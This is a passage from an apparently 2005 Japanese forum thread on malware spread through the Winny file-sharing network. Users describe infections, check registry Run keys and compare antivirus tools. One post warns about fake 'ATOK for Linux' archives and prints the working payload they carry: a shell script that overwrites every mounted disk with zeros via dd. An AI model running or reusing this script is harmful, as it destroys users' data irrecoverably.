ozawa.exeとmadoka.exeを全探索しましたが見付かりませんでした。

また出た。この女が。こわい...

354:[名無し]さん(bin+cue).rar
05/02/10 01:07:50 3EO3/V1T0
新種というか亜種だろうな
最新のウイルス定義でも全ての亜種を防ぐわけじゃないから

355:[名無し]さん(bin+cue).rar
05/02/10 01:08:16 L+wkb+490
タスクマネージャで怪しいプロセス片っ端から閉じろ
それから感染元は何か調べる。後はしらね

356:[名無し]さん(bin+cue).rar
05/02/10 01:17:44 jpXD2K630
>>353
再インスコしとけ、それが嫌ならその女一生飼っとけ。

357:[名無し]さん(bin+cue).rar
05/02/10 01:29:18 li/KneUL0
ともかくozawa部分だけでもどうにかしようとあがくも、どこから起動しているかすら分からない

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
ひとつひとつ検索したが、mp3infpとTweakMeUp以外全部ハードウェアもの
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceは空
前述の通りWIN.INIにRun=なし

しかし再起動するとozawa


358:[名無し]さん(bin+cue).rar
05/02/10 01:38:52 D7UbV5eS0
>>357
感染元のファイル名すら書かない君にぴったりの言葉を贈ろう

日記はチラシの裏に書け(AA略)

359:[名無し]さん(bin+cue).rar
05/02/10 01:42:43 nbd5RrmZ0
>357
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
とかスタートアップは?
あとはタスクマネージャのプロセスを全部調べるってとこか

360:[名無し]さん(bin+cue).rar
05/02/10 02:10:23 E/bQZxZE0
>>357
ノートンに報告入れといてね

361:[名無し]さん(bin+cue).rar
05/02/10 02:28:40 zzy+oPI00
みんな踏みまくってるよ。フォルダ偽装なんて知らないやつだらけ。
ウイルスなんて自分は関係ないと思ってる。

362:[名無し]さん(bin+cue).rar
05/02/10 02:54:42 H8Cx+fOD0
>白目のない女性の恐怖画像が画面一杯に突然出る。
>ザザザーのような音も出る

わかっててもコワイな

363:[名無し]さん(bin+cue).rar
05/02/10 05:08:57 vgDMncNg0
ウイルスじゃないから、PCに盛り塩するといいよ。

364:[名無し]さん(bin+cue).rar
05/02/10 05:12:02 psrLZGN30
窓から投げ捨てろ

365:[名無し]さん(bin+cue).rar
05/02/10 06:32:54 Js4DoeKW0
ウイルス撒くやつも踏ませようといろいろ考えてるね

CG集の前編フォルダなるものにはちゃんと画像をいれてて
後編フォルダなるものが.folderなのはワロタよ

366:[名無し]さん(bin+cue).rar
05/02/10 07:54:05 li/KneUL0
>>359
ビンゴ>HKCU
Microsoft製品ではないsyscheck.exeがC:\WINNTにありました

HKCUにもRunがあったとは...

367:[名無し]さん(bin+cue).rar
05/02/10 14:07:06 0o5Ll/4G0
除霊されますた

368:[名無し]さん(bin+cue).rar
05/02/10 21:46:13 LVJVrD/UO
W32/Pate.b
ってウイルスに感染してしまいました。
ダウンロードしたファイルは一応スキャンしたんですが・・・
とりあえずググッてみても駆除方法がわかりません
バカなワシにご指導を・・・

369:[名無し]さん(bin+cue).rar
05/02/10 22:25:45 A33DbpE40
    /" ̄'ヽ,       /" ̄ヽ,
   /     , i.     /     i
  ,'     /  i-─-.,'   /  ',
  !    ,'  .i     i   / 、  i
  .!    .!'ー'´     'ー"´ ヽ   i 
  !     ! ,ヘ  ,  λ , ,イ  ',__,ノ  
  ヽ,_   _,ノr'-+ーイ  ノ -i- 、i   ゝ
   )  ̄.レイ r;:=-;、レ゙ r;=;:t iイノイ
  i    i .! ヒ__,!   ヒ_,!! ,' i、
  /  i  λ.""       ! .i
  i  .人  ゝ    -   ,.イ /〈  
  ) ノヽノ、レ'イ`yー--r ,くリレ'ヽノ 
  レヽr ´ゝ,.-- 、`ー-ー'y- 、
   /  /  、ノ777777777777t
   i   i  |||           |
   ゝr⌒/ . ||| .知っているが |
    ', ´  .||| .お前の態度が|ヽ
   , '"y- イ||| 気にいらない r'^ヽ
   ',/  ./|||          (  i
  /    ll.L___________________」ー'"

370:[名無し]さん(bin+cue).rar
05/02/10 22:36:07 C+9Iu0zT0
>>368
先ず最初に>>1じっくり見つめるんだ
そして深呼吸をして1行1行丁寧に詠んで行く
リズムは乱さないようにな
そうすれば何をするべきかが見えてくるぞ

371:[名無し]さん(bin+cue).rar
05/02/10 22:37:02 QU524JCE0
今日の朝、ノートン2005のログを見ていたらファイルを
ウイルススキャンしてW32.HLLW.Antinnyが引っかかり手動で削除しましたと
あったのですが感染を水際で防ぎ感染していないとみていいのでしょうか?
念のためシステムの完全スキャンをしてみても何もひっかかり
ませんでした。nyが入っている外付けHDDも一応スキャンしても何も検出
されず、感染したと思われる兆候も見た感じではないみたいです。
昨晩私が寝ている間に
ファイルを開こうとした●が開く前?にウイルススキャンをして何かを
削除したこと、削除後そのファイルを開こうと必死になったこと
しか把握してなくてウイルス入りファイルを実行しちまったのか
覚えてなくて困ってます。

372:[名無し]さん(bin+cue).rar
05/02/10 22:42:10 3EO3/V1T0
アンチウイルスソフトが何のためにあるのかと(ry

373:[名無し]さん(bin+cue).rar
05/02/10 23:17:31 dg5QlmdD0
つか>>1をちゃんと読んだのかと(ry

374:[名無し]さん(bin+cue).rar
05/02/10 23:46:34 TGY6uaPC0
ノートン先生も報われないよな

375:[名無し]さん(bin+cue).rar
05/02/10 23:47:57 SmFl9iFM0
こんなところでてぬを見ることになるとは思わなかった

376:[名無し]さん(bin+cue).rar
05/02/11 00:08:26 Z6O4gaKm0
先生はワーカホリック

377:[名無し]さん(bin+cue).rar
05/02/11 02:30:28 /5B8jTis0
>>371
検疫ログ見ればどのファイルか分かるだろうから、
もう一度キャッシュからファイル変換してみ。
先生、怒らないから。

ついでにバックアップを提出しとけ。

378:[名無し]さん(bin+cue).rar
05/02/11 03:03:08 4cp1HU0N0
W32.HLLW.Antinny について質問させていただいて、よろしいでしょうか?


379:[名無し]さん(bin+cue).rar
05/02/11 03:05:33 WgRPIS2p0
>>1

380:378
05/02/11 03:11:11 4cp1HU0N0
>>379
あっ!すすみません!
改行がおおすぎる、とゆわれたので2つにわけます。

【使用OS】
Windows2000 Professional
【WindowsUpdateしてるか】
あまりしていません・・
【AntiVirusは何を使っているか】
antivirusを知りません。。ごめんなさい。。
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
W32.HLLW.Antinny
Program FilesのCommon Files→Microsoft Shared→MSInfo→msinfo32.exe
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
 1.起動している最中に本体から変な音がする(ガガガガ等)
 2.windows画面になった途端、ポーンとエラー音がなる(怪しすぎる!)
 3.マウスの調子が悪くなる(ダスクトップにあるアイコンはクリックできない)
 4.スタートメニューからコントロールパネルを開こうとしても開かない
 5.スタートメニューからエクスプローラで開くとうまくいく(場合がある)
 6.エクスプローラからコントロールパネルを開こうとすると「アクセスは拒否されました」
 のようなエラーメッセージが出る
 7.ウイルスチェックをすると2つ見つかり、1つは駆除できましたがもう1つは出来ず
 再起動してもう一度ウイルスチェックすると、なぜかウイルス検出0になっている。
 8.2時間ほどパソコンを放っておくと通常どうり操作可能になる。

381:378
05/02/11 03:12:36 4cp1HU0N0
【何をしたらそんなことになったのか】
いきなり突然、です。同居者と共有しているもので、明確にはわからないです。
【これまでにとった措置】
ウイルスを削除。

W32.HLLW.Antinny はwinnyを狙ったワームと聞きましたが
私はwinnyを使ったことがありませんし、このファイルももっていません。
winnyを使ってない人の所へ入ったり、又、入ったとして被害が出たりするのでしょうか?
よろしくお願いします!

382:[名無し]さん(bin+cue).rar
05/02/11 03:23:18 6uJ6wsXI0
>>380
単にHDDが壊れかけだけなんじゃ。

383:[名無し]さん(bin+cue).rar
05/02/11 03:27:00 xDS0Wek10
>>380
Program Filess下のmsinfo32.exeを上書き(?)って初見だな、2000特有のものらしいし

取りあえずぁゃιぃプロセスを止めて、親ファイル削除、そしてレジストリ修復
まぁ、他にもなんか感染してそうだし素直にクリーンインスコを勧める

因みにny使用者でなくても物を踏めば感染する
どうでも良いが、「いう」を「ゆう」と表記するのは止めた方が良い

384:[名無し]さん(bin+cue).rar
05/02/11 03:31:31 Dl+HrxDX0
>>380
その「同居人」とやらがWinnyを使ってないという保証もないしな。

385:[名無し]さん(bin+cue).rar
05/02/11 03:50:02 Rsui7PMx0
>>379
『まず、ここは初心者の質問・救済スレではありません。』
のことを示したかったと思うんだがどうよ

386:[名無し]さん(bin+cue).rar
05/02/11 04:59:27 SWWJjqCl0
どう考えてもそうだろ

387:[名無し]さん(bin+cue).rar
05/02/11 05:51:29 j8Jgm6140
しかもage質ときたもんだ

388:[名無し]さん(bin+cue).rar
05/02/11 10:13:46 1Hlxlk8c0
てゆーかnyを使った事もない人間が、antinyだからってこのスレに来たって言うわけ?
普通このスレ見つけるより先にセキュ板かなんかにいくと思うんだが。


まぁそれはそれとして。
スタートアップ系のチェックと現プロセスの確認ってところじゃないのかあとは。
全フォルダ精査してnyが無いか探してみるとか。
OS再インストールが最強。

389:やりすぎ
05/02/11 10:55:28 B8b+zTyqO
仙台凶暴だな
マイドキュメント直撃かよ。。。

390:378
05/02/11 13:05:47 4cp1HU0N0
どうもありがとうございました。
今日は変な音もしませんでしたし、操作は何故かスムーズにいきました。
もうちょっと様子をみてから色々ためしてみます!

391:[名無し]さん(bin+cue).rar
05/02/11 13:24:19 r5q7HNlK0
.me11p0
ってファイルが流れてて
ためしに落として調べたらパス付きzipだった
中身はどうやら.IAF
URLリンク(ccfa.info)

これってやばくないか?

392:[名無し]さん(bin+cue).rar
05/02/11 13:35:03 y8XwQ1fv0
そりゃデータ元の人間にとってはやばいだろうな。メルアド悪用されるかもしれんし
.me11p0ってめるぽか

393:[名無し]さん(bin+cue).rar
05/02/11 14:04:50 nhGdSyay0
一言だけ言っておくけどな
ここはsage推奨じゃないぞ
基本的に質問するときはageるものだ

394:[名無し]さん(bin+cue).rar
05/02/11 14:22:34 2hSJUG150
age質もあくまで最新ノートンやバスターで検出されないものに限るけどな

395:[名無し]さん(bin+cue).rar
05/02/11 14:26:24 j8Jgm6140
>>393
一言だけ言っておくけどな
ここは質問スレじゃないぞ
基本的に質問するときは質問スレでするものだ

396:[名無し]さん(bin+cue).rar
05/02/11 16:01:33 nhGdSyay0
>>395
なるほど。

397:[名無し]さん(bin+cue).rar
05/02/11 16:07:10 z5wHpDot0
ちょっとスレ違いかも
そもそもWinnyを媒介にするウイルスってUpFolder.txtを書き換えて拡散させようとするんだから、
WinNT系ならUpFolder.txtの属性を、読み込みのみ書き込み拒否属性に書き換えればウマーなんじゃないかと
欄検眼段のウイルスにかかった友達のPCを直してて気づいた
何で早く気づかなかったんだろう自分

398:[名無し]さん(bin+cue).rar
05/02/11 16:23:18 y8XwQ1fv0
>>397
では次は実験だ
読み取り専用にしたaaa.txtと、別のフォルダにもう一つaaa.txtを用意して、
読み取り専用でないほうを読み取り専用のaaa.txtがあるフォルダに移動してみるんだ。

まあそれ以前に、ワーム系の機能がなくともローカルフォルダのものを勝手にうpさせられることが十分痛手なんだから
拡散防止措置を考える前にウイルスプログラムを実行しないようにしろってこった

399:インリン
05/02/11 17:47:25 B8b+zTyqO
エロゲーイメージをマウント。。。
なんだなみんな。きっと

400:[名無し]さん(bin+cue).rar
05/02/11 18:09:31 Jqo5N8BU0
>>397
URLリンク(www.microsoft.com)
> 一度プログラムを実行すると、
> そのプログラムはあなた自身がコンピュータで実行できる処理を
> 何でも行うことができるようになります。

401:[名無し]さん(bin+cue).rar
05/02/11 18:18:28 NbmY9W1i0
>>399
で?

402:[名無し]さん(bin+cue).rar
05/02/11 18:36:52 B8b+zTyqO
お疲れさまです(笑)

403:[名無し]さん(bin+cue).rar
05/02/11 21:25:37 7ioOqnvqO
初めまして。突然ですが質問させてください。
1週間くらいnyを起動しっ放しで
今日久しぶりにパソコンをいじってみたら
なぜか重いのでとりあえず再起動してみたら
パスワードが間違ってい るで(正確なパスなのに)ユーザーログインできません。
ユーザーアカウントはこれ一つなので
今何もできない状態です。
このようなことをするウイルスは出回っているのでしょうか?
今は携帯からアクセスしています
どうかご指摘お願いします。


404:[名無し]さん(bin+cue).rar
05/02/11 22:19:05 BaTs3hlv0
>>403

 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
       ____.____    | .__    パソコンを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄

405:[名無し]さん(bin+cue).rar
05/02/11 22:45:48 uQxbXYyh0
スマソ。色々調べてみたんだけど、よくわからんのでお聞きします。
XP起動時にHDからアクセス音が止まりません。タスクマネージャを開いてみると
「MM」というプログラムが実行されており、このタスクを終了させるとHDへの
アクセスは止まります。プログラムのアイコンはUNと書かれたものでした。
これって何なんでしょうか?

406:[名無し]さん(bin+cue).rar
05/02/11 22:49:30 Rsui7PMx0
(´・ω・`)しらんがな

407:[名無し]さん(bin+cue).rar
05/02/12 00:11:08 aJ0bMzDt0
質問テンプレも読まないやつが厚顔無恥に書き込むこんな世の中じゃ(ry

408:[名無し]さん(bin+cue).rar
05/02/12 00:17:15 rXp7usQA0
ポイズン

409:[名無し]さん(bin+cue).rar
05/02/12 03:02:31 m1VjmALg0
WinXPSP2、WU済み
ノートンUpdate済み

(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE page.57 「二択」.zip UperOOnise 1b1ee36abf324cf4ccdaca3d245391f4
に入ってたexe踏んじゃった・・・
zip解凍するとWinRARアイコンのexeファイル(サイズ:2.28 MB)とUpper.mp3
exe実行でデスクトップキャプチャ(ユーザー名のデスクトップ.bmp)、
壁紙変更(まだ懲りないの?.bmp *内容:晒されたっていいじゃないの 泥棒だもの ぬるぽ)
MP3は先に消したので分からないが、音が鳴るのかも
nyのiniにぬるぽ無し、Upフォルダ追加無し、Upfolder.txt追記無し
レジストリはよく分からないが、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
には変わった値はない気がする
Cドライブを.exeで検索後、更新日時、作成日時でソートしたが怪しいファイルは見つからず
ウィルススキャンしても検出出来ず

これは既出?

410:[名無し]さん(bin+cue).rar
05/02/12 03:02:49 jfgwByGq0
<404
国へ帰れ。

411:[名無し]さん(bin+cue).rar
05/02/12 03:13:46 Q3/xb0y10
「晒されたっていいじゃないか泥棒だもの ぬるぽ」
ウィルスに引っかかって勝手に変えられた壁紙だけど・・・ケッコー気に入った。
ちょうど壁紙探してたから感謝感謝!

412:409
05/02/12 03:27:25 m1VjmALg0
壁紙うpしてみる
bmpだと2Mもあるからpngで。
URLリンク(sylphys.ddo.jp)

なんだか今のところ痛くもかゆくもないんだけど・・・
これから何かあるんだろうか?
一応スタートアップも確認したし、今日はとりあえず寝るかな

413:[名無し]さん(bin+cue).rar
05/02/12 04:31:38 /TNDgjXk0
>409
既出というか、ちょろっと落として先頭ブロック表示しただけで
かっとばせヌルポース.zip とか /../../../../../Documents and Settings/All Users/~
とかいう文字が見えた時点で(ry

414:[名無し]さん(bin+cue).rar
05/02/12 08:41:38 tt0na5K10
>>403
Numlockじゃねーの。
ウイルスだとしたらご愁傷様。それと報告乙。

415:[名無し]さん(bin+cue).rar
05/02/12 08:42:28 tt0na5K10
間違えたCapslockだ

416:[名無し]さん(bin+cue).rar
05/02/12 10:36:54 HvsYg15v0
ノートPCだと、ものによってはNumLockで引っかかってる事もある

417:409
05/02/12 10:53:59 m1VjmALg0
>>413
よく分からないけど、こいつはヌルポース?
解凍にはnoah使ったから、変な場所に解凍される事はないと思うけど、
exe踏んだ後の活動内容がよく分からない。
実行時にSS撮って壁紙変えただけで、マイドキュメントとかWinnyフォルダに変なファイル
作るわけでもなく・・・
>>411は何か起きたのかなー

418:[名無し]さん(bin+cue).rar
05/02/12 12:40:43 R/LTPj740
>413 おまい様が途中まで落としたってのは、こっちでは?

   84 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:19:18 ID:UIxh++l70
   (一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE.zip 3,368,888 f5a386c0b77f778bd5eaa18e11a0d5f8

   92 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:24:43 ID:VFelumFG0
   >84 の方のは偽っていうかウィルスっぽいの詰め合わせかな

419:[名無し]さん(bin+cue).rar
05/02/12 13:09:29 wqszjevM0
.me11p0のパスってなんなんだろうな
もしかして作者しか知らないって奴か?

420:397
05/02/12 13:26:01 5xwzIgRG0
>>398
一応実験結果
コピー不可 cmd.exeからでも無理
エディッタ読めても上書き不可
ファイルの所有者を別ユーザーにして実行者と分けているためMSのファイル管理にバグか
ウイルスが所有権を書き換えて書き込み許可をつけなければ書き換えられない。

一応保険の気休めにしかならないです。
一番良いのはワームを踏まないことなのは十分承知

421:[名無し]さん(bin+cue).rar
05/02/12 15:00:45 smIwQcq20
いやーびっくり
俺も>>409とまったく同じ状態だ
なんとなく怖いから現在はサブノートを
使っている状態だ


422:[名無し]さん(bin+cue).rar
05/02/12 15:10:56 smIwQcq20
追記。
win.iniの方にぬるぽガッが入ってた
これは昔感染したウィルスの名残かもしれないから
俺だけの可能性もあるけど一応見てみてくれ

423:[名無し]さん(bin+cue).rar
05/02/12 15:36:05 AdeU+lvr0
オンラインなマシンで妙な挙動やうさんくさい痕跡が見つかったら、
すぐに切断&初期化&新規インスコしないってのは何故なんだ。検証
報告は仮想マシンやオフラインでやるってのが筋だろうに。

昔感染した名残とか平気な顔して言えることか?(´・ω・`)

424:[名無し]さん(bin+cue).rar
05/02/12 17:14:24 eat95GIf0
ウィルスどんどん作って流せ。

425:409
05/02/12 18:39:14 m1VjmALg0
ごめん、検証するスキルのない俺が来るべきスレではなかったね
exe踏んだの初めてだったからちょっとパニくったんだ

面倒だけどクリーンインスコするよ
またノートン先生の使用期限伸びるな・・・

426:[名無し]さん(bin+cue).rar
05/02/12 18:58:07 0vTAE1Wd0
ノートン先生とAVG7とBitDefenderでウィルス対策しております
有効に働いてくれているので感謝しています
しかしノートン先生とAVGだけでも良いような気がしてきた今日この頃です

427:[名無し]さん(bin+cue).rar
05/02/12 21:14:16 eYincy+g0
ノートンだけでもいいんじゃないか
誤作動がうざいが設定でなんとかなるし

428:[名無し]さん(bin+cue).rar
05/02/12 21:31:06 hECHz0Aq0
>>426
ノートンとAVGを併用するメリットが分からない
それの組み合わせなら、ノートンだけかAVG+BitDefenderでいいじゃん

429:[名無し]さん(bin+cue).rar
05/02/12 22:58:10 7zwpKvk70
antinnyに関してだけなら
Norton > AVG > Bit

Bit削っても問題ない。

430:426
05/02/12 23:15:01 AUdkDUq80
>>427
>>428
>>429
わざわざ答えていただきありがたいです
玄人様の意見、参考にさせていただきます

431:[名無し]さん(bin+cue).rar
05/02/12 23:17:13 AdeU+lvr0
>>429
常駐がダブってるとあんまりいくないような気がする。

432:[名無し]さん(bin+cue).rar
05/02/12 23:23:27 pMaM0ZSl0
>>430
わざわざ皮肉言いに来たのか、ご苦労さま

433:[名無し]さん(bin+cue).rar
05/02/13 00:12:06 VJHb0qjp0
>>432
わざわざageてまで言うことか?

434:[名無し]さん(bin+cue).rar
05/02/13 00:14:37 VJHb0qjp0
ところでこの板のIDの末尾って0かOで固定されてんの?

435:[名無し]さん(bin+cue).rar
05/02/13 00:24:35 qUpCYDEj0
またか・・・

436:[名無し]さん(bin+cue).rar
05/02/13 00:36:55 hYbU6/tO0
>>434
m9(^Д^)プギャー

437:[名無し]さん(bin+cue).rar
05/02/13 00:37:49 J4hwylB60
0が男の書き込みでOが女の書き込み
分かったか低脳

438:[名無し]さん(bin+cue).rar
05/02/13 00:40:43 w91NqGDp0
女イネ━━━('A`)━━━ !!

439:[名無し]さん(bin+cue).rar
05/02/13 00:48:07 P8bsgGGW0
[俺のアドレス帳]とかいうの流れてんの確認したけどこれは新種か?

440:[名無し]さん(bin+cue).rar
05/02/13 00:57:23 sSll5S2D0
いきなりウイルスが入って、気づけば消えてるってことありますか?

441:[名無し]さん(bin+cue).rar
05/02/13 01:40:18 /eSYWRiD0
ダウンしただけじゃ感染しないよ。

442:[名無し]さん(bin+cue).rar
05/02/13 02:56:19 gyGj6etUO


443:[名無し]さん(bin+cue).rar
05/02/13 03:20:37 jKSAIGFA0
んじゃぁ、俺はどっちだ

444:[名無し]さん(bin+cue).rar
05/02/13 05:19:29 S5wqXwBc0
ネカマ

445:[名無し]さん(bin+cue).rar
05/02/13 10:02:37 vSr3w6E60
>>439
>>11

446:[名無し]さん(bin+cue).rar
05/02/13 10:26:02 FfIijSVE0
>>409の詳細マダー?

447:[名無し]さん(bin+cue).rar
05/02/13 10:31:16 vSr3w6E60
ビューワソフトでも入ってたんじゃねか

448:[名無し]さん(bin+cue).rar
05/02/13 12:39:01 NY04I2Ol0
俺も>>409踏んじまったんだが
壁紙変えて画面キャプチャするだけのウィルスなんてあんのかな?
exe本体と壁紙サイズが同じくらいだったんだが(2.28M、2.25M)、これは関係なし?

449:[名無し]さん(bin+cue).rar
05/02/13 15:57:18 nmfcKRgN0
まず流通しているノートン自体にウイルスがある場合があるので気をつけろ
無料版とかあるならそちらでまず対処するのが吉だぜ



450:[名無し]さん(bin+cue).rar
05/02/13 16:07:42 B2yAGC8p0
書庫解凍後にフォルダアイコンをダブルクリックしたらmellpoに引っかかった(*´Д`)
HDDガリガリアクセスしだしたのでタスクマネージャーでプロセス見たらmellpo.exe発見即停止
mellpoでファイル検索、program filesフォルダ内にmellpo.exeとhogehogeファイルを確認
2つのファイルは更新日時が同じでhogehogeファイルはメールボックスファイルのフルパスがリストアップしてあった(* ゚д゚)ガクブル
UpFolder.txtの変化無し
レジストでRunには変化無し、mellpoで検索1件ヒット
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICacheに発見
ノートンUpdate済みスキャンで検出無し


451:[名無し]さん(bin+cue).rar
05/02/13 16:10:31 ET6j2PhB0
質問スレから誘導されて来ました。とりあえずそのまま書き込みます。

ny関係のフォルダの中の、Upフォルダはどういう仕組みになってるのですか?
これは何だろうと見てみたら、ダウンしたこともないアダルト系の圧縮ファイルが
いーーっぱいあって驚きました。容量食うし何か分からないので全部消去しましたが
今日見てみるとまた少し溜まってました。何なのか教えて下さい。

452:[名無し]さん(bin+cue).rar
05/02/13 16:20:22 wCKpg0Qc0
>>451
質問する前にテンプレ>>1-13を熟読してください。

453:[名無し]さん(bin+cue).rar
05/02/13 16:22:45 Ntn5FObd0
>>451
テンプレが理解できなくても、ここで解説を求めないでください。

454:451
05/02/13 16:41:42 ET6j2PhB0
読んだつもりでしたが見逃していました。
同じような症状があるのですね、お騒がせしました。

455:[名無し]さん(bin+cue).rar
05/02/13 17:58:22 T1oJoBDM0
>>451
>>1の1行目から見逃すのは如何なものか

456:[名無し]さん(bin+cue).rar
05/02/13 22:36:19 S5wqXwBc0
>>451
(((;゚д゚))ガクガクブルブル

457:[名無し]さん(bin+cue).rar
05/02/13 22:58:18 JXQ6bCqx0
機転をきかして、
それが正常ですって何で言わないの?

458:[名無し]さん(bin+cue).rar
05/02/13 23:13:03 RlPSFcY40
ウィルス感染が広がったらnyのためにならないから。

459:[名無し]さん(bin+cue).rar
05/02/13 23:41:35 Cdbg4rKp0
このスレが本来の役割を果たしてないってのは、nyネットワークに
とってはいいことなんだよな。

460:[名無し]さん(bin+cue).rar
05/02/13 23:53:54 2dA3CWGr0
捏造ファイル一覧@winny

[2005-01-21] atok for linux.zip 4f3e71c955dd8bb0f47a1d122eb93396
[050121] ATOK for Linux.zip 86d2293fe5cf673356e7fd4d7f44b0fe
[2005-01-21] atok for linux.zip 760958c0955d5999d272e63879ece2a3
[2005-01-21] atok for linux.zip fccde84e559e99e2c660b5ce0c0553d3

100MB前後のものは下記掲載の全削除スクリプトが入っているので要注意!!

#!/bin/sh

# Source function library.
. /etc/rc.d/init.d/functions

aaa=$(mount | grep '^/dev/' | sort -r | awk '{print $1}')
for disk in $aaa ; do
nohup dd if=/dev/zero of=$disk bs=50000 > /dev/null 2>&1 &
done

捏造ファイル@share

[2005.01.21] ATOK for Linux.zip 9934e1679953bbf42d72c21df8cdf8afe23c6c9a
[2005.01.21] ATOK for Linux.zip 775d1e1e2cd98161087c631b4d37867ce6f856ac

461:[名無し]さん(bin+cue).rar
05/02/14 00:02:52 iUGxWps+0
ATOKぐらい買ってやれよ
今、裁判で大変なんだからさw

462:[名無し]さん(bin+cue).rar
05/02/14 00:23:33 Dz3BBZmb0
>>461
買えなくなったりしてw

463:[名無し]さん(bin+cue).rar
05/02/14 01:47:10 hAsCfGtk0
つーかWinnyを狙ってないよな

464:[名無し]さん(bin+cue).rar
05/02/14 02:02:17 F4x00gBw0
>>463
ワロス

465:ram
05/02/14 03:21:04 8HDLnSS70
【使用OS】 xp home (SP2)でした。
【WindowsUpdateしてるか】 してました。
【使用AntiVirusソフト】ノートン先生
【AntiVirusをUpdateしてるか】 してました。
【ウイルススキャンの結果】 下記参照。
【オンラインスキャンしたなら結果】下記参照。
【Winnyのバージョン】 2
【Winny歴、総DL量】 1年半・120G
【テンプレを読んだか】 読んでます。
【テンプレにある対策を実行したか】 してました。
【症状、具体的に分かる限りすべて書く】
久しぶりにPC全体にスキャンかけたら、ドキュメント&セッティングのフォルダの中の、
インターネットテンポラリの添付フォルダに、「[映画]ハウルの動く城.avi.exe」を検知した。
その日、nyを起動してたら、ノードが結構消えてたりもしていました。
【何をしたらそんなことになったのか】 ノートンで久しぶりにPC全体にスキャンをかけてみたから。
【これまでにとった措置】
ノートPCなので、OSの再インストール(上書き?[OSがHDDに内蔵されてるタイプだから・・・。])

こんな感じなのですが、まだウイルスに感染していると思いますか?
また、亜種の可能性ってありますか?

私は極窓等での判別でexeファイルなどを見つけたら開かないようにしているのですが・・・。


466:[名無し]さん(bin+cue).rar
05/02/14 03:26:22 6ib9zEpW0
>>465
その文章からそんなことわかんねーよ。テンプレ読んで死ね。

467:[名無し]さん(bin+cue).rar
05/02/14 11:34:21 InDtnOzg0
ウイルス定義ファイルに注意--シマンテック製品にウイルス感染を招く脆弱性
URLリンク(headlines.yahoo.co.jp)

先生、しっかりしろよw

468:[名無し]さん(bin+cue).rar
05/02/14 11:52:38 2obzU+Uk0
こりゃまた凄いセキュリティホールだな
実行しなくてもメール受信しただけで感染かよw

469:[名無し]さん(bin+cue).rar
05/02/14 12:25:18 hpf+qUap0
先生ッ!

470:[名無し]さん(bin+cue).rar
05/02/14 12:34:04 BlelK1f30
>>467
んなもんとっくに直ってるわい(報告してから対策まで結構時間かかったが)

471:[名無し]さん(bin+cue).rar
05/02/14 13:00:19 iUGxWps+0
>>470
この前ウィルス情報の他にプログラムパッチも来てたがそれか?

472:[名無し]さん(bin+cue).rar
05/02/14 15:32:44 ODivqBvj0
Upフォルダに大量のの冷凍ファイルと謎のオタ男の写真があったんですが
これがキン○マと呼ばれるウイルスですよね?
削除してもどんどん溜まっていくし消せない冷凍ファイルもあるしパニック(´Д⊂
nyなんてたま~にしかしないのに、いつの間に入ってきたんだろぅ。

473:[名無し]さん(bin+cue).rar
05/02/14 15:34:10 6rsj14f+0
>>468
メール受信だけでなく、ダウソファイルに仕掛けてもだろ

474:[名無し]さん(bin+cue).rar
05/02/14 16:37:14 k3sPkcst0
>>472
釣りか

475:[名無し]さん(bin+cue).rar
05/02/14 16:40:34 2obzU+Uk0
キンスマ?

聞いた事ないウイルスだな

476:[名無し]さん(bin+cue).rar
05/02/14 17:30:17 Vt81+PxZ0
>>472
(・∀・)イイ!!

477:[名無し]さん(bin+cue).rar
05/02/14 18:51:44 qf6VxUD60
キンタマファイルを閲覧しているキンタマが流れてそうだなw

478:[名無し]さん(bin+cue).rar
05/02/14 19:23:57 Emg07VCK0
ファイルの展開に「解凍」って言葉は使うのに、圧縮には「冷凍」って言葉使わないんだよな
e-wordsでも出てこないし
不思議っちゃあ不思議

479:[名無し]さん(bin+cue).rar
05/02/14 20:51:09 nql8/sVc0
なんか映画のショーンオブザデッドのファイルにウィルスがあるっぽいな。
読み込んだらギリギリいってnodeがなくなったりwinnyが立ち上がらなくなる。

…でもavi(一応wimanpで開いたら普通に見れた)にウィルスってありえないよな?

480:[名無し]さん(bin+cue).rar
05/02/14 21:38:19 JdibCrin0
>>478
正しくは
圧縮に対して伸張、パック(書庫化)に対してアンパック(展開)
前者と後者を同時に行なう場合は、冷凍と解凍(←これはスラング)

圧縮/伸張は文字通りなんだが、冷凍/解凍はアーカイブ行為に付いて言う
zipなどは、圧縮しながら書庫化(パック化)するので、本来は冷凍/解凍となる

e-wordsに書いてあるようなことは、あまり信頼できない。

481:[名無し]さん(bin+cue).rar
05/02/15 01:42:31 QjT8xRS80
なんかshareでキンタマ落としたらlzhなのに開けなくて
真空波動に落としたら音声だけの喘ぎ声が・・・外人ぽかった
なんたら病院とかいう人の

482:[名無し]さん(bin+cue).rar
05/02/15 07:46:40 j24EsbnE0
ふんふん・・・、それで?

483:[名無し]さん(bin+cue).rar
05/02/15 07:54:11 /xYGAnlj0
ファイルをうpしてないのにupfolder.txtが作られたんですけど、
0KBで何も入ってません。
これはセーフなんでしょうか?

484:[名無し]さん(bin+cue).rar
05/02/15 09:13:42 3lmXk8jY0
            ,ィ⊃  , -- 、
  ,r─-、      ,. ' /   ,/     }
 {     ヽ  / ∠ 、___/    |
 ヽ.      V-─- 、  , ',_ヽ /  ,'
   ヽ  ヾ、  ',ニ、 ヽ_/ rュ、 ゙、 /
     \  l  トこ,!   {`-'}  Y
      ヽj   'ー'' ⊆) '⌒`  !   K
        l     ヘ‐--‐ケ   }   札
        ヽ.     ゙<‐y′   /   で
